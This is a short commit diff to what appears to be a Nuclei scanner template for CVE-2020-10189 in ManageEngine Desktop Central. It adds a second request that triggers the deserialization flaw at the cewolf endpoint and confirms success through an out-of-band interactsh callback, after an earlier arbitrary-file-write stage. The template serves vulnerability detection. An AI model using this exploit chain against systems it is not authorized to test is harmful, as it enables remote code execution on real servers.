Add Stage 2

Stage 2 triggers the deserialization vulnerability in `getChartImage()`.

http/cves/2020/CVE-2020-10189.yaml

@@ -39,6 +39,7 @@ http:
       - type: dsl
         dsl:
           - compare_versions(version, '<10.0.474')
+
   # arbitrary file write
   - method: POST
     headers:
@@ -53,3 +54,19 @@ http:
       - type: status
         status:
           - 200
+
+  # deserialization
+  - method: POST
+    path:
+      - "https://{Host}:8383/cewolf/{{File}}?img=\\logger.zip"
+
+    matchers-condition: and
+    matchers:
+      - type: status
+        status:
+          - 200
+
+      - type: word
+        part: interactsh_protocol
+        words:
+          - "http"